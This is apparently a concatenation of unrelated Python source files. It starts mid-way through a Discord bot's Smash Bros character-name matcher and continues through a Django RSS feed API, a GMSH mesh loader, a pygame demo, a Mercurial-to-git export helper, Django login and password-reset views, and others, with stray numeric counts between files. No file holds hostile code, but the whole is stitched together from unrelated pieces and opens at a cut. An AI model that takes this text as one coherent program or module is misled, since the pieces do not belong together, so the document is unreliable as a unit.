ch_name == 'ファルコ': if 'ファルコン' in content: return False elif ch_name == 'クッパ': if ('ジュニア' in content) or ('Jr' in content) or ('jr' in content): return False elif ch_name == 'ピット': if ('ブラック' in content): return False elif ch_name == self.MYCHARACTER: if self._judgeMyCharacterNameContained(client, ch_name, content): return False return True def _judgeMyCharacterNameContained(self, client, ch_name, content) -> bool: all_channels = client.get_all_channels() for channel in all_channels: if channel.name == ch_name: continue elif (channel.name in content): return True return False def judgeFuzzyCharacterName(self, ch_name: str, content: str): """ 質問対象のキャラに対して、質問が投下されるべきチャンネルがどれなのかを メッセージのキャラ名とキャラクター毎の対策チャンネル名を見比べることで判別している。 ただ、窓民が質問メッセージを書く際に、キャラクターの名前が微妙にチャンネル名と違っちゃう場合が 出てくることが予測される。その名前の差分を力ずくで補完してくれる関数がこいつである。 TO:DO 本当はさ、もっとスッキリ書けることなんてわかってるんだよ。でもさ、メンドかったんだよ。許してくれな。 """ # ★各キャラ窓へ③ # |ch_nameがチャンネル名称からキャラ名を抽出したものです。 # |各キャラ窓のサーバーに適用させる場合、 # |1. if ch_name == 〜の行のキャラ名をチャンネル名称のキャラ名に合わせる # |2. ネス窓ではポケトレは1つのチャンネルで対応しているので、これを分ける # | (分けるに当たり、他の関数も変えるといったことは不要なはずです) # |3. ネス窓ではMiiファイター用の対策チャンネルを作成していないので、これを作る # (作るに当たり、他の関数も変えるといったことは不要なはずです) if ch_name in content: return True if ch_name == "ドクマリ": if ('ドクター' in content) or ('Dr' in content) or ('dr' in content) or ('医者' in content): return True if ch_name == "ロゼッタ&チコ": if ('ロゼチコ' in content) or ('ロゼッタ' in content): return True if ch_name == "クッパjr": if ('ジュニア' in content) or ('Jr' in content) or ('jr' in content): return True if ch_name == "パックンフラワー": if ('パックン' in content) or ('花' in content): return True if ch_name == "ドンキーコング": if ('DK' in content) or ('D.K.' in content) or ('D.K' in content) or ('ドンキー' in content) or ('ゴリラ' in content): return True if ch_name == "ディディーコング": if ('DD' in content) or ('D.D.' in content) or ('D.D' in content) or ('ディディー' in content) or ('猿' in content): return True if ch_name == "キングクルール": if ('クルール' in content) or ('鰐' in content) or ('ワニ' in content): return True if ch_name == "ガノンドロフ": if ('ガノン' in content) or ('おじさん' in content): return True if ch_name == "ヤングリンク": if ('ヤンリン' in content) or ('こどもリンク' in content) or ('子どもリンク' in content) or ('子供リンク' in content): return True if ch_name == "トゥーンリンク": if ('トリン' in content): return True if ch_name == "ダークサムス": if ('ダムス' in content): return True if ch_name == "ゼロスーツサムス": if ('ダムス' in content) or ('ゼロサム' in content) or ('ZSS' in content) or ('ゼロスーツ・サムス' in content): return True if ch_name == "ピチュー": if ('ピチュカス' in content): return True if ch_name == "ミュウツー": if ('M2' in content) or ('m2' in content): return True if ch_name == "ポケモントレーナー": if ('ポケモン・トレーナー' in content) or ('ポケトレ' in content) or ('ゼニガメ' in content) \ or ('フシギソウ' in content) or ('リザードン' in content) or ('リザ' in content): return True if ch_name == "ゲッコウガ": if ('蛙' in content): return True if ch_name == "メタナイト": if ('メタ' in content): return True if ch_name == "デデデ": if ('デデデ大王' in content): return True if ch_name == "フォックス": if ('狐' in content): return True if ch_name == "ブラックピット": if ('ブラック・ピット' in content) or ('ブラピ' in content): return True if ch_name == "むらびと": if ('ムラビト' in content) or ('村人' in content): return True if ch_name == "アイスクライマー": if ('アイス・クライマー' in content) or ('アイクラ' in content): return True if ch_name == "インクリング": if ('スプラゥーン' in content) or ('インリン' in content) or ('イカちゃん' in content) \ or ('いかちゃん' in content) or ('烏賊' in content) or ('イカ' in content): return True if ch_name == "キャプテン・ファルコン": if ('ファルコン' in content) or ('キャプテンファルコン' in content) or ('CF' in content) \ or ('C.F' in content) or ('cf' in content) or ('c.f' in content): return True if ch_name == "ダックハント": if ('ダック・ハント' in content) or ('犬' in content): return True if ch_name == "ピクミン&オリマー": if ('ピクミン&オリマー' in content) or ('ピクオリ' in content) or ('ピクミン' in content) or ('オリマー' in content): return True if ch_name == "リトル・マック": if ('リトルマック' in content) or ('マック' in content) or ('トルマク' in content): return True if ch_name == "ロボット": if ('ロボ' in content): return True if ch_name == "mrゲーム&ウォッチ": if ('ゲムヲ' in content) or ('ゲムオ' in content) or ('ミスター' in content) \ or ('ゲーム&ウォッチ' in content) or ('ゲーム&ウォッチ' in content): return True if ch_name == "wii-fitトレーナー": if ('フィットレ' in content) or ('Wii Fit' in content) or ('wii fit' in content) \ or ('Wii fit' in content) or ('wii Fit' in content) or ('Wii-Fit' in content) or ('wii-fit' in content) \ or ('Wii-fit' in content) or ('wii-Fit' in content)or ('wii-Fit' in content) \ or ('tトレーナー' in content)or ('Tトレーナー' in content) or ('t トレーナー' in content)or ('T トレーナー' in content): return True if ch_name == "パックマン": if ('金玉' in content): return True if ch_name == "ベヨネッタ": if ('ベヨ' in content): return True if ch_name == "ロックマン": if ('ロック' in content) or ('岩男' in content): return True if ch_name == "ジョーカー": if ('ペルソナ' in content): return True if ch_name == "格闘mii": if ('格闘Mii' in content) or ('格闘MII' in content): return True if ch_name == "剣術mii": if ('剣術Mii' in content) or ('剣術MII' in content): return True if ch_name == "射撃mii": if ('射撃Mii' in content) or ('射撃MII' in content) or ('シャゲミ' in content): return True if ch_name == "勇者": if ('HERO' in content) or ('hero' in content) or ('Hero' in content) \ or ('HELO' in content) or ('helo' in content) or ('Helo' in content) \ or ('ゆうしゃ' in content) or ('ユウシャ' in content) or ('ゆーしゃ' in content) \ or ('ユーシャ' in content) or ('ひーろー' in content) or ('ヒーロー' in content) \ or ('よしひこ' in content) or ('ヨシヒコ' in content): return True if ch_name == "バンジョー&カズーイ": if ('バンジョー&カズーイ' in content) or ('バンジョーとカズーイ' in content) or ('バンカズ' in content) \ or ('バンジョー' in content) or ('カズーイ' in content): return True if ch_name == "ベレスト": if ('ベレス' in content) or ('ベレト' in content): return True return False
9,593
4,074
# Copyright (c) 2017 Ansible by Red Hat # All Rights Reserved # Borrow from another AWX command from awx.main.management.commands.deprovision_instance import Command as OtherCommand # Python import warnings class Command(OtherCommand): def handle(self, *args, **options): # TODO: delete this entire file in 3.3 warnings.warn('This command is replaced with `deprovision_instance` and will ' 'be removed in release 3.3.') return super(Command, self).handle(*args, **options)
528
151
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseNotFound, HttpResponseNotAllowed from django.db import transaction import requests import ujson from url_normalize import url_normalize from api import models, query_utils, feed_handler, rss_requests, archived_feed_entry_util from api.exceptions import QueryException from api.context import Context _OBJECT_NAME = 'feed' def feed(request): permitted_methods = {'GET'} if request.method not in permitted_methods: return HttpResponseNotAllowed(permitted_methods) # pragma: no cover if request.method == 'GET': return _feed_get(request) def feeds_query(request): permitted_methods = {'POST'} if request.method not in permitted_methods: return HttpResponseNotAllowed(permitted_methods) # pragma: no cover if request.method == 'POST': return _feeds_query_post(request) def feed_subscribe(request): permitted_methods = {'POST', 'PUT', 'DELETE'} if request.method not in permitted_methods: return HttpResponseNotAllowed(permitted_methods) # pragma: no cover if request.method == 'POST': return _feed_subscribe_post(request) elif request.method == 'PUT': return _feed_subscribe_put(request) elif request.method == 'DELETE': return _feed_subscribe_delete(request) def _save_feed(url): response = None try: response = rss_requests.get(url) response.raise_for_status() except requests.exceptions.RequestException: raise QueryException('feed not found', 404) with transaction.atomic(): d = feed_handler.text_2_d(response.text) feed = feed_handler.d_feed_2_feed(d.feed, url) feed.with_subscription_data() feed.save() feed_entries = [] for d_entry in d.get('entries', []): feed_entry = None try: feed_entry = feed_handler.d_entry_2_feed_entry(d_entry) except ValueError: # pragma: no cover continue feed_entry.feed = feed feed_entries.append(feed_entry) models.FeedEntry.objects.bulk_create(feed_entries) return feed def _feed_get(request): context = Context() context.parse_request(request) context.parse_query_dict(request.GET) url = request.GET.get('url') if not url: return HttpResponseBadRequest('\'url\' missing') url = url_normalize(url) field_maps = None try: fields = query_utils.get_fields__query_dict(request.GET) field_maps = query_utils.get_field_maps(fields, _OBJECT_NAME) except QueryException as e: # pragma: no cover return HttpResponse(e.message, status=e.httpcode) feed = None try: feed = models.Feed.annotate_subscription_data( models.Feed.objects.all(), request.user).get(feed_url=url) except models.Feed.DoesNotExist: try: feed = _save_feed(url) except QueryException as e: return HttpResponse(e.message, status=e.httpcode) ret_obj = query_utils.generate_return_object(field_maps, feed, context) content, content_type = query_utils.serialize_content(ret_obj) return HttpResponse(content, content_type) def _feeds_query_post(request): context = Context() context.parse_request(request) context.parse_query_dict(request.GET) if not request.body: return HttpResponseBadRequest('no HTTP body') # pragma: no cover json_ = None try: json_ = ujson.loads(request.body) except ValueError: # pragma: no cover return HttpResponseBadRequest('HTTP body cannot be parsed') if type(json_) is not dict: return HttpResponseBadRequest('JSON body must be object') # pragma: no cover count = None try: count = query_utils.get_count(json_) except QueryException as e: # pragma: no cover return HttpResponse(e.message, status=e.httpcode) skip = None try: skip = query_utils.get_skip(json_) except QueryException as e: # pragma: no cover return HttpResponse(e.message, status=e.httpcode) sort = None try: sort = query_utils.get_sort(json_, _OBJECT_NAME) except QueryException as e: # pragma: no cover return HttpResponse(e.message, status=e.httpcode) search = None try: search = query_utils.get_search(context, json_, _OBJECT_NAME) except QueryException as e: # pragma: no cover return HttpResponse(e.message, status=e.httpcode) field_maps = None try: fields = query_utils.get_fields__json(json_) field_maps = query_utils.get_field_maps(fields, _OBJECT_NAME) except QueryException as e: # pragma: no cover return HttpResponse(e.message, status=e.httpcode) return_objects = None try: return_objects = query_utils.get_return_objects(json_) except QueryException as e: # pragma: no cover return HttpResponse(e.message, status=e.httpcode) return_total_count = None try: return_total_count = query_utils.get_return_total_count(json_) except QueryException as e: # pragma: no cover return HttpResponse(e.message, status=e.httpcode) feeds = models.Feed.annotate_search_vectors(models.Feed.annotate_subscription_data( models.Feed.objects.all(), request.user)).filter(*search) ret_obj = {} if return_objects: objs = [] for feed in feeds.order_by( *sort)[skip:skip + count]: obj = query_utils.generate_return_object( field_maps, feed, context) objs.append(obj) ret_obj['objects'] = objs if return_total_count: ret_obj['totalCount'] = feeds.count() content, content_type = query_utils.serialize_content(ret_obj) return HttpResponse(content, content_type) def _feed_subscribe_post(request): user = request.user url = request.GET.get('url') if not url: return HttpResponseBadRequest('\'url\' missing') url = url_normalize(url) feed = None try: feed = models.Feed.objects.get(feed_url=url) except models.Feed.DoesNotExist: try: feed = _save_feed(url) except QueryException as e: return HttpResponse(e.message, status=e.httpcode) custom_title = request.GET.get('customtitle') existing_subscription_list = list(models.SubscribedFeedUserMapping.objects.filter( user=user).values_list('feed__feed_url', 'custom_feed_title')) existing_feed_urls = frozenset(t[0] for t in existing_subscription_list) existing_custom_titles = frozenset( t[1] for t in existing_subscription_list if t[1] is not None) if custom_title is not None and custom_title in existing_custom_titles: return HttpResponse('custom title already used', status=409) if feed.feed_url in existing_feed_urls: return HttpResponse('user already subscribed', status=409) read_mapping_generator = archived_feed_entry_util.read_mapping_generator_fn( feed, user) with transaction.atomic(): models.SubscribedFeedUserMapping.objects.create( user=user, feed=feed, custom_feed_title=custom_title) archived_feed_entry_util.mark_archived_entries(read_mapping_generator) return HttpResponse(status=204) def _feed_subscribe_put(request): user = request.user url = request.GET.get('url') if not url: return HttpResponseBadRequest('\'url\' missing') url = url_normalize(url) custom_title = request.GET.get('customtitle') subscribed_feed_mapping = None try: subscribed_feed_mapping = models.SubscribedFeedUserMapping.objects.get( user=user, feed__feed_url=url) except models.SubscribedFeedUserMapping.DoesNotExist: return HttpResponseNotFound('not subscribed') if custom_title is not None: if models.SubscribedFeedUserMapping.objects.exclude(uuid=subscribed_feed_mapping.uuid).filter(user=user, custom_feed_title=custom_title).exists(): return HttpResponse('custom title already used', status=409) subscribed_feed_mapping.custom_feed_title = custom_title subscribed_feed_mapping.save(update_fields=['custom_feed_title']) return HttpResponse(status=204) def _feed_subscribe_delete(request): url = request.GET.get('url') if not url: return HttpResponseBadRequest('\'url\' missing') url = url_normalize(url) count, _ = models.SubscribedFeedUserMapping.objects.filter( user=request.user, feed__feed_url=url).delete() if count < 1: return HttpResponseNotFound('user not subscribed') return HttpResponse(status=204)
8,775
2,654
#!/usr/bin/env python # encoding: utf-8 #------------------------------------------------------------------------------ # Application Name #------------------------------------------------------------------------------ app_name = "naked" #------------------------------------------------------------------------------ # Version Number #------------------------------------------------------------------------------ major_version = "0" minor_version = "1" patch_version = "31" #------------------------------------------------------------------------------ # Debug Flag (switch to False for production release code) #------------------------------------------------------------------------------ debug = False #------------------------------------------------------------------------------ # Usage String #------------------------------------------------------------------------------ usage = """ Usage: naked <primary command> [secondary command] [option(s)] [argument(s)] --- Use 'naked help' for detailed help --- """ #------------------------------------------------------------------------------ # Help String #------------------------------------------------------------------------------ help = """ --------------------------------------------------- Naked A Python command line application framework Copyright 2014 Christopher Simpkins MIT license --------------------------------------------------- ABOUT The Naked framework includes the "naked" executable and the Python toolshed library. The naked executable is a command line tool for application development, testing, profiling, and deployment. The toolshed library contains numerous useful tools for application development that can be used through standard Python module imports. These features are detailed in the documentation (link below). USAGE The naked executable syntax is: naked <primary command> [secondary command] [option(s)] [argument(s)] The <primary command> is mandatory and includes one of the commands in the following section. The [bracketed] syntax structure is optional and dependent upon the primary command that you use. Use the command 'naked <primary command> help' for details about a command. PRIMARY COMMANDS SECONDARY COMMANDS args help build help classify help dist all•help•sdist•swheel•wheel•win help - none - locate main•help•settings•setup make help profile help pyh help test nose•pytest•tox•unittest usage - none - version - none - HELP To learn more about a primary command, use the following syntax: naked <primary command> help DOCUMENTATION http://docs.naked-py.com SOURCE REPOSITORY https://github.com/chrissimpkins/naked ISSUE REPORTING https://github.com/chrissimpkins/naked/issues """
2,954
656
# -*- coding: utf-8 -*- """ Created on Fri Mar 27 18:54:01 2020 @author: giova """ import numpy as np import sys import meshio # Creates a mesh class class Mesh: def __init__(self): self.el_def = None self.material = None self.conn_table = None self.cds_table = None self.elements = None # globdof.shape[0] self.nodes = None # max(max(globdof[:,-1]),max(globdof[:,-2]))+1 self.nodesperelem = None self.dofspernode = None self.totdofs = None self.d = None # spatial dimensions #--------------------------------------------------------------------------- # Functions below do not belong to mesh Class #--------------------------------------------------------------------------- def el_mat(mesh,i): """ Returns the material of the current element, as defined in the material dictionary""" el_mat = mesh.material[i] return el_mat def el_type(mesh, i): """ Returns the element type of the current element""" #TODO: eliminate this function el_type = mesh.elementType[i] if el_type!=0 and el_type!=1: print('\n','Element', i, 'ERROR! Element type not recognised') sys.exit() return el_type def coordinates(mesh,i): rows = mesh.conn_table[i] cds = mesh.points[rows] return cds def NodesInElement(mesh,i): NodesInElement=mesh.conn_table[i] return NodesInElement def get_key(my_dict,val): """ Function to return key for any value. """ # This function returns the key if the first item in the array value # of a dictionary is equal to val. If my_dict contains # 'Fixed': array([667, 0]), get_key(my_dict,667) returns Fixed for key, value in my_dict.items(): if val == value[0]: return key print("\n value",val,"doesn't exist as \'key\': array([value, 0]) in\n", my_dict) sys.exit() def GMSH(mesh_file): sys.path.append("PRE") # create a mesh object mesh = meshio.read("D:/Documents/GitHub/metis-fem/fempagno/PRE/"+mesh_file+".msh") # check if the mesh object contains attributes needed by pyFEM # - pyFEM_MeshAttributes is a list of all the mesh attributes needed by pyFEM # - we are going to reuse the attribute points and add the other attribute from pyFEM_MeshAttributes pyFEM_MeshAttributes = ["d", "dofsNode", "elements", "elementMaterialTag", "elementType", "points"] for attribute in pyFEM_MeshAttributes: if attribute in dir(mesh): if attribute == "points": pass else: print("Error: meshio already contains the attribute",attribute) print(" ...do something!") sys.exit() # add the missing attributes from pyFEM_MeshAttributes # Note: it is assumed that the mesh is two-dimensional and that the # domain is dicretized with triangular elements and that there are # two degrees of freedom per node (i.e., this is a plain equilibrium problem) mesh.elements = 0 mesh.nodes = len(mesh.points) mesh.dofspernode = 2 mesh.totdofs=mesh.nodes*mesh.dofspernode mesh.d = 2 mesh.dofsNode = 2 mesh.conn_table = [] mesh.material = [] mesh.el_def = [] mesh.elementType = [] mesh.material = [] meshing = False quad = False try: dummy = mesh.cell_data_dict['gmsh:physical']['quad'] quad = True except KeyError: # print("No quadrilateral elements in mesh") pass triangle = False try: dummy = mesh.cell_data_dict['gmsh:physical']['triangle'] triangle = True except KeyError: # print("No triangular elements in mesh") pass if quad: meshing = True quads = len(mesh.cell_data_dict["gmsh:physical"]["quad"]) mesh.elements += quads for t in range(quads): mesh.conn_table.append(mesh.cells_dict["quad"][t]) materialTag=mesh.cell_data_dict["gmsh:physical"]["quad"][t] # we assume that a physical surface in 2D is only used to identify # elements with the same material property. # GMSH identifies a physical group by a tag and a name. # Tags are stores in cell_data_dict for each element. # Tags and names are linked in field_data # The function get_key returns the name (=key) for a given tag key = get_key(mesh.field_data, materialTag) mesh.material.append(key) mesh.elementType.append('quad') if triangle: meshing = True triangles = len(mesh.cell_data_dict["gmsh:physical"]["triangle"]) mesh.elements += triangles for t in range(triangles): mesh.conn_table.append(mesh.cells_dict["triangle"][t]) materialTag=mesh.cell_data_dict["gmsh:physical"]["triangle"][t] # we assume that a physical surface in 2D is only used to identify # elements with the same material property. # GMSH identifies a physical group by a tag and a name. # Tags are stores in cell_data_dict for each element. # Tags and names are linked in field_data # The function get_key returns the name (=key) for a given tag key = get_key(mesh.field_data, materialTag) mesh.material.append(key) mesh.elementType.append('triangle') if not meshing: print("something went wrong: could not extract mesh data") sys.exit() mesh.points = mesh.points[:, 0:mesh.d] #resize to the number of spatial dimensions in the problem # TODO: ...check that all the necessary attributes have been defined in a correct manner # library of the possible elements mesh.element_lib = { 'spring' : {'stiffness matrix' : {'evaluation' : 'closed form', 'domain' : None, 'rule' : None, 'points' : None}}, 'bar' : {'stiffness matrix' : {'evaluation' : 'numerical integration', 'domain' : 'line', 'rule' : 'Gauss Legendre', 'points' : 2}}, 'triangle' : {'stiffness matrix' : {'evaluation' : 'numerical integration', 'domain' : 'triangle', 'rule' : 'Gauss Legendre', 'points' : 1}}, 'quad' : {'stiffness matrix' : {'evaluation' : 'numerical integration', 'domain' : 'quad', 'rule' : 'Gauss Legendre', 'points' : 4}} } return mesh
7,959
2,171
from distutils.core import setup setup( author='Marco Westerhof', author_email='mephistolomaniac@gmail.com', url='https://github.com/mephizzle/python-funkyfunc', name='FunkyFunk', version='0.0.2-dev', packages=['funkyfunc'], license='Apache 2.0', long_description=open('README.txt').read(), )
326
121
from .base import LinearRegression
35
9
#!/usr/bin/env python3 # # https://stackoverflow.com/a/48034477/1832058 # import pygame pygame.init() screen = pygame.display.set_mode((300, 200)) pressed = pygame.key.get_pressed() clock = pygame.time.Clock() is_running = True while is_running: for event in pygame.event.get(): if event.type == pygame.QUIT: is_running = False elif event.type == pygame.KEYDOWN: if event.key == pygame.K_ESCAPE: is_running = False last_pressed = pressed pressed = pygame.key.get_pressed() # --- get only keys which changed state --- changed = [idx for idx in range(len(pressed)) if pressed[idx] != last_pressed[idx]] print(changed) # or changed = [idx for idx, (a, b) in enumerate(zip(last_pressed, pressed)) if a != b] print(changed) # --- True/False for all keys --- changed = [pressed[idx] != last_pressed[idx] for idx in range(len(pressed))] print(changed) # or changed = [a != b for a, b in zip(last_pressed, pressed)] print(changed) # --- clock.tick(25) pygame.quit()
1,116
385
""" sqlalchemy patcher module """ from __future__ import absolute_import from epsagon.modules.general_wrapper import wrapper from ..events.sqlalchemy import SqlAlchemyEventFactory from ..utils import patch_once def _wrapper(wrapped, instance, args, kwargs): """ General wrapper for sqlalchemy instrumentation. :param wrapped: wrapt's wrapped :param instance: wrapt's instance :param args: wrapt's args :param kwargs: wrapt's kwargs :return: None """ return wrapper(SqlAlchemyEventFactory, wrapped, instance, args, kwargs) def patch(): """ patch module. :return: None """ patch_once( 'sqlalchemy.orm.session', 'Session.__init__', _wrapper ) patch_once( 'sqlalchemy.orm.session', 'Session.close', _wrapper )
828
260
def make_profile(): from selenium import webdriver fp = webdriver.FirefoxProfile() fp.set_preference("network.proxy.http", "pywb"); fp.set_preference("network.proxy.http_port", 8080); fp.set_preference("network.proxy.share_proxy_settings", True); fp.set_preference("network.proxy.ssl", "pywb"); fp.set_preference("network.proxy.ssl_port", 8080); fp.set_preference("network.proxy.type", 1); fp.update_preferences() return fp.path
471
176
from typing import Optional from app import model, client from app.component.connect import resolver class SinkResolver(resolver.BaseConnectResolver): def __init__(self, *, connect_client: client.ConnectClient): super().__init__(connect_client=connect_client, connector_type=model.RESOURCE_SINK) def _get_schema(self, target: model.SpecItem) -> Optional[model.SchemaParams]: return None
415
118
""" Scrapy-Cookies signals These signals are documented in docs/topics/signals.rst. Please don't add new signals here without documenting them there. """ cookies_invalidated = object()
187
59
#!/usr/bin/python # -*- coding: utf-8 -*- from rons_tutorial_formatting import * print_block_separator() x = 1 while x < 10: print x, x += 1 end_block(True) start_block() words = ['hello', 'world', 'have', 'a', 'nice', 'day'] for word in words: if word.isalpha() and word[0] == 'h': print word, elif len(word) == 1: print word.upper(), else: shortened_word = word[:-1] print shortened_word.title(), end_block(True) start_block() for value_in_range in range(12, 98, 3): print value_in_range, ',', end_block(True) start_block() the_range = range(1, 10) for j in the_range: if j > 9: print j break else: print "The range `%s` does not contain anything greater than 9" % the_range print for j in range(0, 1000, 10): if j < 500: continue print j, ',', end_block(True)
881
347
# Some imports from matplotlib import pyplot as plt import cv2 # for display from skimage import data # for loading example data from skimage.color import rgb2gray # for converting to grayscale # Load image, convert to grayscale and show it image = rgb2gray(data.astronaut()) def draw_image_histogram(image, channels, color='k'): hist = cv2.calcHist([image], channels, None, [256], [0, 256]) plt.plot(hist, color=color) plt.xlim([0, 256])
471
168
class Stack: def __init__(self): self.items = [] def is_empty(self): # return len(self.items) == 0 return not self.items def push(self, item): self.items.append(item) def pop(self): return self.items.pop() def peek(self): return self.items[-1] def size(self): return len(self.items) def __str__(self): return str(self.items) if __name__ == "__main__": string = ".koob doog a htiw nohtyP nraeL" reversed_string = "" s = Stack() for char in string: s.push(char) while not s.is_empty(): reversed_string += s.pop() print(reversed_string)
677
238
#!/usr/bin/env python2 # pylint: disable=E1101.E0602 # Copyright (c) 2007, 2008 Rocco Rutte <pdmef@gmx.net> and others. # License: MIT <http://www.opensource.org/licenses/mit-license.php> import os import re import subprocess import sys from mercurial import error as hgerror from mercurial import hg, templatefilters, ui from mercurial.scmutil import binnode, revsymbol PY2 = sys.version_info.major < 3 if PY2: str = unicode # noqa: F821 fsencode = lambda s: s.encode(sys.getfilesystemencoding()) # noqa: E731 else: from os import fsencode # default git branch name cfg_master = b"master" # default origin name origin_name = b"" # silly regex to see if user field has email address user_re = re.compile(b"([^<]+) (<[^>]*>)$") # silly regex to clean out user names user_clean_re = re.compile(b'^["]([^"]+)["]$') def set_default_branch(name): global cfg_master cfg_master = name.encode("utf8") if not isinstance(name, bytes) else name def set_origin_name(name): global origin_name origin_name = name def setup_repo(url): try: myui = ui.ui(interactive=False) except TypeError: myui = ui.ui() myui.setconfig(b"ui", b"interactive", b"off") # Avoids a warning when the repository has obsolete markers myui.setconfig(b"experimental", b"evolution.createmarkers", True) return myui, hg.repository(myui, fsencode(url)).unfiltered() def fixup_user(user, authors): user = user.strip(b'"') if authors is not None: # if we have an authors table, try to get mapping # by defaulting to the current value of 'user' user = authors.get(user, user) name, mail, m = b"", b"", user_re.match(user) if m is None: # if we don't have 'Name <mail>' syntax, extract name # and mail from hg helpers. this seems to work pretty well. # if email doesn't contain @, replace it with devnull@localhost name = templatefilters.person(user) mail = b"<%s>" % templatefilters.email(user) if b"@" not in mail: mail = b"<devnull@localhost>" else: # if we have 'Name <mail>' syntax, everything is fine :) name, mail = m.group(1), m.group(2) # remove any silly quoting from username m2 = user_clean_re.match(name) if m2 is not None: name = m2.group(1) return b"%s %s" % (name, mail) def get_branch(name): # 'HEAD' is the result of a bug in mutt's cvs->hg conversion, # other CVS imports may need it, too if name == b"HEAD" or name == b"default" or name == b"": name = cfg_master if origin_name: return origin_name + b"/" + name return name def get_changeset(ui, repo, revision, authors={}, encoding=""): # Starting with Mercurial 4.6 lookup no longer accepts raw hashes # for lookups. Work around it by changing our behaviour depending on # how it fails try: node = repo.lookup(revision) except (TypeError, hgerror.ProgrammingError): node = binnode(revsymbol(repo, b"%d" % revision)) # We were given a numeric rev except hgerror.RepoLookupError: node = revision # We got a raw hash (manifest, user, (time, timezone), files, desc, extra) = repo.changelog.read(node) if encoding: user = user.decode(encoding).encode("utf8") desc = desc.decode(encoding).encode("utf8") tz = b"%+03d%02d" % (-timezone // 3600, ((-timezone % 3600) // 60)) branch = get_branch(extra.get(b"branch", b"master")) return ( node, manifest, fixup_user(user, authors), (time, tz), files, desc, branch, extra, ) def mangle_key(key): return key def load_cache(filename, get_key=mangle_key): cache = {} if not os.path.exists(filename): return cache f = open(filename, "rb") linecount = 0 for line in f.readlines(): linecount += 1 fields = line.split(b" ") if fields is None or not len(fields) == 2 or fields[0][0:1] != b":": sys.stderr.write( "Invalid file format in [%s], line %d\n" % (filename, linecount) ) continue # put key:value in cache, key without ^: cache[get_key(fields[0][1:])] = fields[1].split(b"\n")[0] f.close() return cache def save_cache(filename, cache): f = open(filename, "wb") for key, value in cache.items(): if not isinstance(key, bytes): key = str(key).encode("utf8") if not isinstance(value, bytes): value = str(value).encode("utf8") f.write(b":%s %s\n" % (key, value)) f.close() def get_git_sha1(name, type="heads"): try: # use git-rev-parse to support packed refs ref = "refs/%s/%s" % (type, name.decode("utf8")) line = subprocess.check_output( ["git", "rev-parse", "--verify", "--quiet", ref.encode("utf8")] ) if line is None or len(line) == 0: return None return line[0:40] except subprocess.CalledProcessError: return None
5,100
1,722
""" 最终的结果要考虑 Python 的int 类型会比一般语言的长,所以要考虑 32位这个范围。 """ class Solution: def reverse(self, x: int) -> int: y = x if x < 0: y = -1 * x y = str(y)[::-1] if x < 0: r = -1 * int(y) else: r = int(y) return r if -2147483648 < r < 2147483647 else 0
331
179
"""Define padrões de URL para users""" from django.urls import path, include from django.contrib.auth.views import LoginView from . import views urlpatterns = [ # Página de Login path('login', LoginView.as_view(template_name='users/login.html'), name='login'), path('logout', views.logout_view, name='logout'), path('register', views.register, name='register') ]
382
118
import logging from django.contrib.auth import get_user_model, authenticate from django.contrib.auth.mixins import LoginRequiredMixin from django.http import Http404 from django.views.generic import RedirectView from rest_framework import status, permissions from rest_framework.exceptions import ValidationError from rest_framework.generics import get_object_or_404 from rest_framework.response import Response from rest_framework.reverse import reverse from rest_framework.views import APIView from rest_framework.viewsets import ModelViewSet from resumecollection.users.helpers import UpdatePasswordHelper from resumecollection.users.v1.serializers import ( UserSerializer, ForgotPasswordEmailSerializer, UpdatePasswordRequestSerializer, LoginRequestSerializer, ) from resumecollection.utils.authentication import create_login_token from resumecollection.utils.email import send_password_update_email from resumecollection.utils.permissions import UpdatePasswordPermission from resumecollection.utils.response_handler import validation_exception_handler logger = logging.getLogger(__name__) User = get_user_model() class UserModelViewSet(ModelViewSet): serializer_class = UserSerializer queryset = User.objects.all() lookup_field = "username" class UserRedirectView(LoginRequiredMixin, RedirectView): def get_redirect_url(self): return reverse("users:detail", kwargs={"username": self.request.user.username}) class ForgotPasswordAPIView(APIView): def validate_email(self, query_params): serializer = ForgotPasswordEmailSerializer(data=query_params) serializer.is_valid(raise_exception=True) return serializer.validated_data.get("email") def get(self, request) -> Response: try: user_email_address = self.validate_email(request.query_params) user = get_object_or_404(User, email=user_email_address) send_password_update_email( user, UpdatePasswordHelper.generate_update_password_url(user) ) except Http404: logger.error( f"Failure to find the object, the User with the email " f"{user_email_address} doesnt exist" ) return Response( data=f"The User with the email {user_email_address} doesnt exist.", status=status.HTTP_400_BAD_REQUEST, ) except ValidationError as validation_error: logger.error( f"Validation error occurred while sending forget password email. " f"Error: {validation_error}" ) return Response( data="The email address is not valid", status=status.HTTP_400_BAD_REQUEST, ) logger.info( f"Email for updating password has been sent to {user_email_address}" ) return Response( data="Email has been sent successfully", status=status.HTTP_200_OK ) class UpdateUserPasswordAPIView(APIView): permission_classes = [UpdatePasswordPermission] def get_permissions(self): if self.request.data.get("is_admin"): return [permissions.IsAuthenticated()] return super(UpdateUserPasswordAPIView, self).get_permissions() def post(self, request) -> Response: try: serialized_data = UpdatePasswordRequestSerializer(data=request.data) serialized_data.is_valid(raise_exception=True) user = get_object_or_404(User, email=request.data.get("email")) user.set_password(serialized_data.data["confirm_password"]) user.save() UpdatePasswordHelper.invalidate_update_password_token(user.email) return Response( data="Password has been updated successfully", status=status.HTTP_200_OK ) except Http404: logger.error(f"Failure to find the object, user with email doesnt exist") return Response( data="The User doesn't exist", status=status.HTTP_400_BAD_REQUEST ) except ValidationError as validation_error: logger.error( f"Validation error occurred while updating the password with {validation_error}" ) return Response( data=f"Failed to update the password with {validation_error}", status=status.HTTP_400_BAD_REQUEST, ) class LoginUserAPIView(APIView): permission_classes = [permissions.AllowAny] def post(self, request): try: request_serializer = LoginRequestSerializer(data=request.data) request_serializer.is_valid(raise_exception=True) username = request_serializer.validated_data["username"] password = request_serializer.validated_data["password"] remember_me = request_serializer.validated_data["remember_me"] user = authenticate(username=username.lower(), password=password) if not user: return Response( data="Credentials not correct. Unable to Login.", status=status.HTTP_401_UNAUTHORIZED, ) token = create_login_token(user, remember_me) return Response( data={ "token": token, "user": UserSerializer(user).data, "message": "Successfully logged in.", }, status=status.HTTP_200_OK, ) except ValidationError as error: logger.info( f"Validation failed for User Login with exception {error}" ) data = validation_exception_handler(error) data.update({"message": error.default_detail}) return Response(data=data, status=status.HTTP_400_BAD_REQUEST)
5,923
1,513
